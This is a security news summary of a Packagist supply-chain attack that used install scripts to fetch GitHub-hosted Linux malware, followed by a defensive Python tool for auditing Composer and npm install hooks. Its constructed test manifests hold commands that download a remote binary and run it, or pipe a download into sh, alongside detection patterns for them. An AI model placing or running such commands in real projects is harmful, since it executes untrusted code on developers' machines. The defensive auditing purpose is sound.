Packagist Supply Chain Attack Infects 8 Packages Using GitHub-Hosted Linux Malware

A supply chain attack targeting the PHP ecosystem compromised eight packages on Packagist, the primary package repository for PHP. The attackers embedded malicious scripts in package.json files that, during composer install operations, downloaded and executed Linux malware binaries hosted on GitHub. This technique exploits the trust relationship between developer workstations, package managers, and code hosting platforms to bypass network security controls — the malware originates from a trusted domain and is fetched during what appears to be a normal dependency installation. The attack demonstrates the accelerating expansion of supply chain compromise techniques beyond the npm and PyPI ecosystems that have seen the bulk of recent attacks. PHP development teams should audit their composer.json and package.json files for unexpected scripts and implement dependency integrity verification.
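The audit recommended above can be partly automated. The script below is an added example written for this summary; it is not code from the report or from any affected Packagist package. It parses a composer.json or package.json, looks only at the lifecycle hooks that run without the developer naming them, and flags commands that combine a remote fetch (curl, wget, a GitHub URL) with execution or staging behaviour (chmod +x, piping into a shell, a scratch directory, backgrounding). The hook names are the real Composer and npm event names; the three sample manifests are constructed, and the EXAMPLE-PLACEHOLDER repository in them is a placeholder, not an indicator.

```python
"""Audit Composer / npm manifests for install-time scripts that download and run code.

Added example for the pattern described above: malicious lifecycle scripts that fetch
a binary from GitHub during `composer install`. Not code from the report or from any
affected package. Sample manifests are constructed; EXAMPLE-PLACEHOLDER is not real.
"""
import json
import re

# Composer events that fire automatically during install/update (real event names).
COMPOSER_INSTALL_HOOKS = {
    "pre-install-cmd", "post-install-cmd", "pre-update-cmd", "post-update-cmd",
    "pre-autoload-dump", "post-autoload-dump", "post-root-package-install",
    "post-create-project-cmd", "pre-package-install", "post-package-install",
    "pre-package-update", "post-package-update",
}
# npm lifecycle scripts that run on `npm install` without being named by the user.
NPM_INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}

# Behaviours that deserve a human look when they appear in an install hook.
INDICATORS = [
    (r"\b(curl|wget)\b", "fetches a remote resource"),
    (r"https?://(raw\.)?github(usercontent)?\.com/", "references a GitHub-hosted URL"),
    (r"\bchmod\b.*\+x", "marks a downloaded file executable"),
    (r"\bbase64\b.*(-d|--decode)", "decodes base64 content"),
    (r"\|\s*(sh|bash|php)\b", "pipes content into an interpreter"),
    (r"(^|[\s;&|])(/tmp/|/dev/shm/|/var/tmp/)", "uses a world-writable scratch directory"),
    (r"\bnohup\b|&\s*$", "backgrounds a process"),
]
FETCH_REASONS = {"fetches a remote resource", "references a GitHub-hosted URL"}


def _commands(value):
    """A script entry may be a single command string or a list of command strings."""
    if isinstance(value, str):
        return [value]
    if isinstance(value, list):
        return [v for v in value if isinstance(v, str)]
    return []


def audit_scripts(manifest_text, kind):
    """Return findings for install-time hooks in a composer.json (kind='composer')
    or package.json (kind='npm') manifest supplied as JSON text."""
    hooks = COMPOSER_INSTALL_HOOKS if kind == "composer" else NPM_INSTALL_HOOKS
    scripts = json.loads(manifest_text).get("scripts") or {}
    findings = []
    for hook, value in scripts.items():
        if hook not in hooks:
            continue  # only runs when a developer invokes it by name
        reasons = []
        for cmd in _commands(value):
            # "@other-script" references and "Class::method" PHP callbacks are
            # Composer-internal, not shell commands, so they are skipped here.
            if cmd.startswith("@") or "::" in cmd:
                continue
            for pattern, reason in INDICATORS:
                if re.search(pattern, cmd, re.IGNORECASE) and reason not in reasons:
                    reasons.append(reason)
        if reasons:
            # Download combined with any execution/staging step is the reported pattern.
            fetches = bool(FETCH_REASONS & set(reasons))
            acts = bool(set(reasons) - FETCH_REASONS)
            findings.append({
                "hook": hook,
                "severity": "high" if fetches and acts else "medium",
                "reasons": reasons,
                "commands": _commands(value),
            })
    return findings


# Constructed benign manifest in the Laravel style: PHP callbacks and @php directives only.
BENIGN_COMPOSER = r"""{
  "name": "example/app",
  "scripts": {
    "post-autoload-dump": [
      "Illuminate\\Foundation\\ComposerScripts::postAutoloadDump",
      "@php artisan package:discover --ansi"
    ],
    "post-update-cmd": "@php artisan vendor:publish --tag=laravel-assets --ansi --force",
    "test": "phpunit"
  }
}"""

# Constructed malicious manifest: fetch, mark executable, run in background.
MALICIOUS_COMPOSER = r"""{
  "name": "example/look-alike",
  "scripts": {
    "post-install-cmd": [
      "curl -sL https://raw.githubusercontent.com/EXAMPLE-PLACEHOLDER/repo/main/build -o /tmp/.build",
      "chmod +x /tmp/.build",
      "/tmp/.build &"
    ]
  }
}"""

# Constructed npm equivalent: a GitHub download piped straight into sh.
MALICIOUS_NPM = r"""{
  "name": "example-look-alike",
  "scripts": {
    "postinstall": "curl -sL https://github.com/EXAMPLE-PLACEHOLDER/repo/releases/download/v1/agent | sh",
    "test": "jest"
  }
}"""

if __name__ == "__main__":
    for label, text, kind in [("benign composer.json", BENIGN_COMPOSER, "composer"),
                              ("malicious composer.json", MALICIOUS_COMPOSER, "composer"),
                              ("malicious package.json", MALICIOUS_NPM, "npm")]:
        print(label, json.dumps(audit_scripts(text, kind), indent=2))
```

Run it over every composer.json and package.json in a repository and its vendor/ and node_modules/ trees; the benign Laravel-style manifest yields no findings, while both constructed malicious manifests come back as high severity. The scan is a review aid, not a gate: hooks can also be skipped outright with `composer install --no-scripts` or `npm install --ignore-scripts` when installing dependencies that have not yet been reviewed, and the lockfile's recorded package hashes should still be verified separately.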
